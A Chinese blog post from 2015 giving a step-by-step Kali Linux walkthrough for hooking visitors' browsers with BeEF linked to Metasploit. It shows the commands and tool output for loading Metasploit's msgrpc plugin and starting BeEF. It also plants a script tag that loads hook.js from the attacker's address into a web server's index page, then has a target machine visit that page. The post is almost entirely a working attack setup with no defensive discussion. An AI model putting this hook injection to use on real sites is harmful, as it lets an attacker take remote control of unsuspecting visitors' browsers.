IT博客汇 | 基于Beef+Metasploit颠覆你的浏览器

基于Beef+Metasploit颠覆你的浏览器

青年怪客发表于 2015-09-17 06:54:38

一、查看本机IP地址

root@kali:~# ip add 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:05:7a:89 brd ff:ff:ff:ff:ff:ff
    inet 192.168.34.220/24 brd 192.168.34.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe05:7a89/64 scope link 
       valid_lft forever preferred_lft forever
root@kali:~#

二、嵌入链接代码到html

Hook URL:http://192.168.34.220:3000/hook.js

也可以是这样

<script src="http://192.168.34.220:3000/hook.js"></script>

三、编辑apache目录下的index.html文件，并保存

root@kali:~# vim /var/www/index.html 

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<script src="http://192.168.34.220:3000/hook.js"></script>
</body></html>

四、启动msfconsole

root@kali:~# msfconsole
                                                  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

五、加载Beef

msf > load msgrpc ServerHost=192.168.34.220 Pass=abc123
[*] MSGRPC Service:  192.168.34.220:55552 
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf >

六、启动Beef

root@kali:~# cd /usr/share/beef-xss/
beef  beef_cert.pem  beef_key.pem  config.yaml  core  db  extensions  Gemfile  Gemfile.lock  modules
root@kali:/usr/share/beef-xss# ./beef 
[14:00:02][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[14:00:02][*] Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[14:00:02]    |   Twit: @beefproject
[14:00:02]    |   Site: http://beefproject.com
[14:00:02]    |   Blog: http://blog.beefproject.com
[14:00:02]    |_  Wiki: https://github.com/beefproject/beef/wiki
[14:00:02][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[14:00:04][*] Successful connection with Metasploit.
[14:00:07][*] Loaded 289 Metasploit exploits.
[14:00:08][*] BeEF is loading. Wait a few seconds...
[14:00:13][*] 11 extensions enabled.
[14:00:13][*] 485 modules enabled.
[14:00:13][*] 2 network interfaces were detected.
[14:00:13][+] running on network interface: 127.0.0.1
[14:00:13]    |   Hook URL: http://127.0.0.1:3000/hook.js
[14:00:13]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[14:00:13][+] running on network interface: 192.168.34.220
[14:00:13]    |   Hook URL: http://192.168.34.220:3000/hook.js
[14:00:13]    |_  UI URL:   http://192.168.34.220:3000/ui/panel
[14:00:13][*] RESTful API key: f01d946e3c9b3e9139f1da782f49be9bb3fd88a0
[14:00:13][*] HTTP Proxy: http://127.0.0.1:6789
[14:00:13][*] BeEF server started (press control+c to stop)

并开打开浏览器；http://127.0.0.1:3000/ui/authentication 并进行登录，beef/beef

七、启动Apache 服务

root@kali:~# /etc/init.d/apache2 start
[....] Starting web server: apache2apache2: apr_sockaddr_info_get() failed for kali
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
. ok 
root@kali:~#

八、靶机操作

打开浏览器，并输入192.168.34.220 地址

九、服务端查看上线主机

后面的操作大家自己研究吧。